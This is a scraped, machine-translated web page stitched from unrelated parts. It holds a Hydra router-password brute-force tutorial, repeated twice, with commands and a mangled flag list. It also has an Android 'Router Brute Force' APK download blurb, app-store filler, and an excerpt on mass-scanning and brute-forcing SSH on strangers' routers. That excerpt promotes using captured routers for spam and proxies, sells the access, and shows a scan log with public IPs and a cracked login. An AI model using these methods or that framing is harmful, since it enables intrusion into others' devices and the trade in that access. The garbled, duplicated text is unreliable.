Choose a password and login to the router. We capture the router: mass scan and brute force SSH. Instructions for using the application

*There could be a warning here that you should not use this program for criminal purposes, but hydra writes this before each hacking session*

In general, I decided to delve into the settings of the router according to my needs, I drive in a familiar address to everyone, and then they ask for the password. How to be? Well, I started sorting out passwords, and their number is too large to sort through everything and too small to reset.

And I opened google. After a couple of requests, I found out about such a thing as hydra. And then it began: the thirst for discovery, the search for the unknown, and so on.

Let's get started

First of all, I compiled a password dictionary, neither more nor less, as much as 25 combinations. Next, download either Kali linux or Hydra itself (if you are a penguin, you have Linux). Now we have two options (well, like two, I found information on two options).

Or you have this dialog box:

Either the login and password are requested by the form on the site. My first option, so let's start with it. On our way to the "admin panel" there is a guard in the form of a dialog box. This is the type of authorization. http get.

We open the terminal. Enter:

Hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get/
Where after "-l" comes the login, after "-P" the dictionary, after "-s" the port. We also have other flags at our disposal:

-R restore previous interrupted/broken session
S make an SSL connection
S PORT if the service is not on the default port, then you can set the port here
L LOGIN or -L FILE with LOGINS (names), or load multiple logins from FILE
P PASSWORD or -P FILE with passwords to brute force, or load multiple passwords from FILE
X MINIMUM: MAXIMUM: CHARSET generation of passwords for brute force, type "-x -h" for help
E nsr "n" - try with empty password, "s" - login as password and/or "r" - reverse credentials
U focus on the user, not the passwords (effective! implied using the -x option)
C FILE format where "login: password" is separated by colons, instead of the -L/-P option
M FILE list of servers to attack, one entry per line, after the colon ":" you can specify the port
O FILE write found login/password pairs to FILE instead of standard output
F / -F exit when login/password matched (-M: -f for host, -F globally)
T TASKS number of TASKS running in parallel (per host, default: 16)
W / -W TIME response timeout (32 seconds) / between connections per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
V / -V / -d verbal mode / show username+password for each attempt / debug mode
Q do not print connection error messages
u Details of how to use the module
server target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service service for hacking (see list of supported protocols)
OPT some service modules support extra input (-U for module help)

Well, something like this:

Second option:

Not mine, honestly taken from Antichat, with the correction of the author's grammatical errors (I left an abundance of punctuation marks). I wonder if this can be considered a translation?

We are met by a form on the site:

This authentication method is http-post-form, and here we need to tinker a bit, since we need to understand how the browser sends data to the router.

In this case, I used Chrome browser(its Chromium counterpart in Kali Linux, installed via apt-get install chromium).

Now you need to do one very stupid thing... specify the wrong username and pass...
Why we'll see later...

Press F12 to switch to web page editing mode.

Go to Network → Turn on the checkbox Preserv log.

We enter false login and password ...

Well, what's up? Will not work! Moreover, after several unsuccessful login attempts, the form is blocked for 180 seconds.

Go to tab HEADERS looking for the line:

Request URL: http://192.168.0.1/index.cgi
We cut off everything to the ip-address - /index.cgi… Congratulations, we found the first part of the authorization script… Moving on… Go to the tab FORM DATA and change the display mode to VIEV SOURCE.

update_login=login&update_password=password&check_auth=y&tokenget=1300& update_login=login&update_password=password
Bingo! We found the second part of the authorization script! A little bit more! now you need to find the page with the error message... You need to click on the ELEMENTS tab.

And choose HTML element code (CTRL + SHIFT + C) and select the window with the error message ... in this case - Authentication failed!

Authentication failed!
Choose:

span langkey="bad_auth"
and fix it a bit... bad_auth - that's it! The key is practically in our pocket... Now we can write the full authorization string:

Index.cgi:update_login=login&update_password=password:bad_auth
Now you need to substitute ^USER^ instead of "login" and ^PASS^ instead of "password" and then the line will look like:

Index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth
We enter the command:

Hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth "
Please note that there is a colon between the parts of the script! it is necessary! By the way, there was no blocking of the form through the hydra ... This is very pleasing.

I can’t make sure that the second method works, since I don’t have a suitable router model. You will have to trust the expressive person from Antichat.

If anyone is interested, please, check and unsubscribe in the comments. I worked with a TL-WR1043N / TL-WR1043ND router. Antichat router - D-link300NRU.

Thank you for your attention!

Download Router Brute Force ADS 2 2.5.6 APK For Android, APK File Named And APP Developer Company Is . Latest Android APK Vesion Router Brute Force ADS 2 Is Can Free Download APK Then Install On Android Phone.

Download Router Brute Force ADS 2 2.5.5 APK Other Version

For Download Other Router Brute Force ADS 2 versions Visit Router Brute Force ADS 2 APK Archive.

Download Router Brute Force ADS 2.apk android apk files version 2.5.5 Size is 243333 md5 is By This Version Need Eclair 2.0 API level 5 or higher, We Index Version From this file.Version code 5 equal Version 2.5.5 .You can Find More info by Search evz.android.rbf_ads On Google.If Your Search android,rbf_ads,tools,router,brute,force Will Find More like evz.android.rbf_ads,Router Brute Force ADS 2 2.5.5 Downloaded 1626 Time And All Router Brute Force ADS 2 App Downloaded Time. New fixed version finally released! Please don "t use the old version anymore, uninstall it and use only this version. Simple and effective brute force for routers admin/control pages!(Basic Access Authentication -> Base64) You have connection to free WiFi? But if you want to gain access for router settings,for opening some port or something else you need a password.Here Router Brute Force(RBF) come to help!!!It ships with sample txt file that includes 398 default passwords for different routers,but don"t forget you can update it with your data! If you want to enter specific passwords you can use the comma separated future... Be sure to check the login because it's case-sensitive in some routers(admin/Admin). Use this tool only if you have a strong wifi signal and don't use dictionary files that are greater than 5MB,otherwise it will work very slow! RBF automatically get the default gateway and build the Url,so you don"t need to do any preparations(only if you already connected to wifi). This is experimental tool,use it on your own risk! Please rate the tool and leave comments * Please read the description carefully and don't leave negative feedbacks because of low wifi signal or big dictionary files! *!!! IT IS EXPERIMENTAL APP!!! !!! CURRENTLY WORKS NOT ON ALL ROUTERS!!! !!! SO IF YOU WANT TO HELP,PLEASE LEAVE FEEDBACKS WITH YOUR ROUTER MODEL AND MANUFACTURER !!! **

*There could be a warning here that you should not use this program for criminal purposes, but hydra writes this before each hacking session*

Let's get started

Or you have this dialog box:

We open the terminal. Enter:

Hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get/
Where after "-l" comes the login, after "-P" the dictionary, after "-s" the port. We also have other flags at our disposal:

-R restore previous interrupted/broken session
S make an SSL connection
S PORT if the service is not on the default port, then you can set the port here
L LOGIN or -L FILE with LOGINS (names), or load multiple logins from FILE
P PASSWORD or -P FILE with passwords to brute force, or load multiple passwords from FILE
X MINIMUM: MAXIMUM: CHARSET generation of passwords for brute force, type "-x -h" for help
E nsr "n" - try with empty password, "s" - login as password and/or "r" - reverse credentials
U focus on the user, not the passwords (effective! implied using the -x option)
C FILE format where "login: password" is separated by colons, instead of the -L/-P option
M FILE list of servers to attack, one entry per line, after the colon ":" you can specify the port
O FILE write found login/password pairs to FILE instead of standard output
F / -F exit when login/password matched (-M: -f for host, -F globally)
T TASKS number of TASKS running in parallel (per host, default: 16)
W / -W TIME response timeout (32 seconds) / between connections per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
V / -V / -d verbal mode / show username+password for each attempt / debug mode
Q do not print connection error messages
u Details of how to use the module
server target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service service for hacking (see list of supported protocols)
OPT some service modules support extra input (-U for module help)

Well, something like this:

Second option:

Not mine, honestly taken from Antichat, with the correction of the author's grammatical errors (I left an abundance of punctuation marks). I wonder if this can be considered a translation?

We are met by a form on the site:

This authentication method is http-post-form, and here we need to tinker a bit, since we need to understand how the browser sends data to the router.

In this case, I used the Chrome browser (its analogue of Chromium in Kali Linux is installed via apt-get install chromium).

Now you need to do one very stupid thing... specify the wrong username and pass...
Why we'll see later...

Press F12 to switch to web page editing mode.

Go to Network → Turn on the checkbox Preserv log.

We enter false login and password ...

Well, what's up? Will not work! Moreover, after several unsuccessful login attempts, the form is blocked for 180 seconds.

Go to tab HEADERS looking for the line:

And select the HTML code element (CTRL + SHIFT + C) and select the window with the error message ... in this case - Authentication failed!

Authentication failed!
Choose:

span langkey="bad_auth"
and fix it a bit... bad_auth - that's it! The key is practically in our pocket... Now we can write the full authorization string:

Index.cgi:update_login=login&update_password=password:bad_auth
Now you need to substitute ^USER^ instead of "login" and ^PASS^ instead of "password" and then the line will look like:

Index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth
We enter the command:

I can’t make sure that the second method works, since I don’t have a suitable router model. You will have to trust the expressive person from Antichat.

If anyone is interested, please, check and unsubscribe in the comments. I worked with a TL-WR1043N / TL-WR1043ND router. Antichat router - D-link300NRU.

Thank you for your attention!

Router Brute force can be downloaded to smartphones, phones or tablets with Android versions 3.0, 3.1, 3.2, 4.0, 4.1, 4.2 +

How to install Router Brute force android app on computer

For start mobile version applications on the PC you need:

install downloaded bluestacks emulator;
download the APK file of the application;
drag the file to the Bluestacks home screen;
wait for the installation to complete automatically.

Download other useful applications:

Taking long screenshots
Stitchcraft Free makes it easy to stitch multiple screenshots into one long one. Just like scrolling capture

With the help of Wi-Fi Talkie, you can organize the interaction of devices at a distance of action wifi signal without having to have access

Navitel Navigator is a navigation system that contains a variety of data: traffic jams, information about traffic police surveillance cameras (SPEEDCAM), three-dimensional models of road junctions and significant architectural structures.

Efficient memory optimization wizard to improve device speed
Memory Booster will help improve speed

Version: 3.2.
Developer: Adva Soft
Requirements: Android OS 2.

Description:
TSF Launcher 3D Shell - Innovative
launcher that allows you to fully
freely arrange widgets,
perform multiple

Unlike full-fledged servers, where PAM (Pluggable Authentication Modules) are usually configured, which will restrict access to the server for a time specified in the config after several (usually three to five) unsuccessful login attempts, the Linux router is truncated. There is no PAM on it, so nothing prevents it from being brute. And this idea - brutality and the capture of routers - today, one might say, is in trend!

Our goal is your router

Why do you need to capture the router? It depends on the hacker's imagination: you can use it to send spam, make it a private socks (proxy). And you can sell the access you got - this pleasure costs, according to one of my friends, up to $ 200 a month, and this product is quite popular.

Scanning routers

To gain access, hackers use a simple but effective program Tunnel Scanner. The Type parameter specifies the type of scanning: by static login, by static password, by the list of logins/passwords. The third option (By Login;Password List) is usually the most efficient.

The Static parameter allows you to set the range of IP addresses that will be scanned. If you enable the IP ranges from file checkbox, then the range of IP addresses will be taken from the file specified in the IP ranges field (by default, this is a file named ip.txt). The ranges in it are indicated, as shown in the screenshot below.

The list of logins and passwords is specified by the Login;Password parameter. By default, it is taken from the words.txt file. Of course, the list example below is rather poor, but I think you can easily find a more advanced one on the Web (or you can be smart and create your own).

The Threads parameter specifies the number of concurrent threads to brute. The default value is 900, which is more than enough. The Timeout parameter specifies the timeout in seconds between retries.

Well, it remains to press the Start button.

As you can see, we have already received the first results. Let's analyze them:

37.112.128.160 - failed to connect 37.112.128.164 - checking admin;admin 37.112.128.163 - failed to connect 37.112.128.162 - failed to connect : admin;admin 37.112.128.164 - checking support;support 37.112.128.164 - [-]: support;support 37.112.128.164 - checking root;123456 37.112.128.164 - [-]: root;123456 37.112.128.164 - checking ubnt;ubnt 37.112.128.164 - [-]: ubnt;ubnt 37.112.128.164 - checking ftp;123456 37.112.128.164 - [+]: ftp;123456 …

The number in square brackets is the stream number (it doesn't matter to us). Next, the scanned IP address is indicated. The line failed to connect means that the SSH port is closed - either completely, or for us (by the firewall). A line like [-]: admin;admin reports that the SSH port is open, but the password and/or login did not match. And here is a similar line with + says that everything was successful:

Continued available to members only

Option 1. Join the "site" community to read all the materials on the site

Membership in the community during the specified period will give you access to ALL Hacker materials, increase your personal cumulative discount and allow you to accumulate a professional Xakep Score rating!